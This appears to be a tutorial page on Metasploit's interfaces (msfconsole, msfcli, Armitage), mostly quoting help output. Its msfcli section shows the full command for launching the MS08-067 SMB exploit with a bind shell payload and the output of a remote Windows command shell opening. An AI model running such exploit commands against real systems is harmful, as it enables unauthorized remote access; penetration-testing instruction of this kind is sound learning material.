Metasploit Interface

To perform Metasploit's underlying functionality like the command line, graphical interface, and console, it provides more than one interface. The internal functions of the Metasploit framework have direct access provided by utilities. If we want to exploit development, these utilities are invaluable. These utilities will also be invaluable when we don't want the flexibility of the entire framework. We can access the Metasploit framework in different ways like MsfGUI, Armitage, Msfconsole, Metasploit Pro, Msfweb, and Msfcli.

MSFconsole

The Metasploit framework has the most popular part, named Msfconsole. Within the framework, this type of tool is well-supported, feature-rich, and most flexible. In a framework, a handy all-in-one interface exists, which is provided by Msfconsole to almost every setting and option. It is just like that our exploitation dreams have a one-stop-shop. Using the Msfconsole, we can do anything against the entire network like performing enumeration, launching an exploit, creating listeners, loading auxiliary modules, or running mass exploitation.

If there is constantly changing in the Metasploit framework, the command's subnet remains relatively constant. We can keep up with any changes if we have done mastering in basics of msfconsole. The msfconsole is important in almost every part of this tutorial.

Now we can enter any command in which we are interested with the help command to access the help files of msfconsole. Suppose we want to communicate with the host, we can use help for the connect command, which is shown in the following screenshot. The lists of resulting documentation contain the tools description, usage, and various option flags.

We can put msfconsole followed by -h to access all the help files of msfconsole. After executing this command, the resulted list of documentation will look like this:

root@kali:~# msfconsole -h
Usage: msfconsole [options]

Common options
    -E, --environment ENVIRONMENT    The Rails environment. Will use RAIL_ENV environment variable if that is set.  Defaults to production if neither option, not RAILS_ENV environment variable is set.

Database options
    -M, --migration-path DIRECTORY   Specify a directory containing additional DB migrations
    -n, --no-database                Disable database support
    -y, --yaml PATH                  Specify a YAML file containing database settings

Framework options
    -c FILE                          Load the specified configuration file
    -v, --version                    Show version

Module options
        --defer-module-loads         Defer module loading unless explicitly asked.
    -m, --module-path DIRECTORY      An additional module path


Console options:
    -a, --ask                        Ask before exiting Metasploit or accept 'exit -y'
    -H, --history-file FILE          Save command history to the specified file
    -L, --real-readline              Use the system Readline library instead of RbReadline
    -o, --output FILE                Output to the specified file
    -p, --plugin PLUGIN              Load a plugin on startup
    -q, --quiet                      Do not print the banner on startup
    -r, --resource FILE              Execute the specified resource file (- for stdin)
    -x, --execute-command COMMAND    Execute the specified string as console commands (use ; for multiples)
    -h, --help                       Show this message

MSFcli

In order to provide access to the framework, the different approaches are used by Msfconsole and Msfcli. The msfconsole provides a very interactive, user-friendly way to access all features. While scripting is put as a priority by msfcli and it also puts interpretability with other tools which are based on the console. It uses a command line to run directly instead of using a unique interpreter for framework. Using the command line, we can redirect into msfcli from other tools, and it directs the output of msfcli to other command-line tools. The launch of auxiliary modules and exploits are also supported by Msfcli. For the framework, if the new exploits are developed and modules are tested, it will be convenient. If we know about the options and exploits which we need for unique exploitation, it will become a fantastic tool. The msfconsole is more forgiving as compared to the msfcli. Msfcli offers a command msfcli -h to provide some basic help, as shown here:

root@bt:/opt/framework3/msf3# msfcli -h
Usage: /opt/framework3/msf3/msfcli <exploit_name> <option=value> [mode]
==============================================================================

   Mode           Description
   ----           ---------------
   (H)elp         You're looking at it, baby!
   (S)ummary      Show information about this module
   (O)ptions      Show available options for this module
   (A)dvanced     Show available advanced options for this module
   (I)DS Evasion  Show available ids evasion options for this module
   (P)ayloads     Show available payloads for this module
   (T)argets      Show available targets for this exploit module
   (AC)tions      Show available actions for this auxiliary module
   (C)heck        Run the check routine of the selected module
   (E)xecute      Execute the selected module

root@bt:/opt/framework3/msf3#

If we are learning about the Metasploit and get stuck somewhere, we can add the letter O to the string's end at whichever point we found any problem. Using this letter, we are able to see all the available options in a module. For example, assume that we are stuck in module ms08_067_netapi. Now we will add the letter O after the module to see the available options as follows:

root@bt:/# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    0.0.0.0          yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

The above execution specifies that three options are required by the module, i.e., RHOST, RPORT, and SMBPIPE. Now we will see the available payloads by adding a P as follows:

root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                                   Description
   ----                                   -----------
   generic/debug_trap                     Generate a debug trap in the target process
   generic/shell_bind_tcp                 Listen for a connection
 and spawn a command shell

For our exploit, all the required options are set. Now at the end of msfcli argument string, we will add the letter E and run our exploit as follows:

root@bt:/# msfcli windows/smb/ms08_067_netapi
 RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system3

In the above execution, from the remote system, we have successfully received a Window command prompt.

Armitage

Metasploit has a component named Armitage. It is created by Raphael Mudge, and it contains a graphical user interface, which is very interactive. This user interface is freely available, feature-rich, and highly impressive. In this tutorial, we will not talk about armitage in-depth, but it has many things that are worth mentioning to explore. In this section, we will learn about the ins and outs of Metasploit. If we are able to understand the working of framework, GUI will become awesome for us.

We will run the armitage command to launch the armitage. At the time of startup, we have to select Start MSF. Using this, Metasploit instance and armitage can be connected.

When the armitage is starting running, we can click on the menu to access other Metasploit functionality and perform a particular attack. For example, the browser (client-side) exploits are shown in the following screenshot: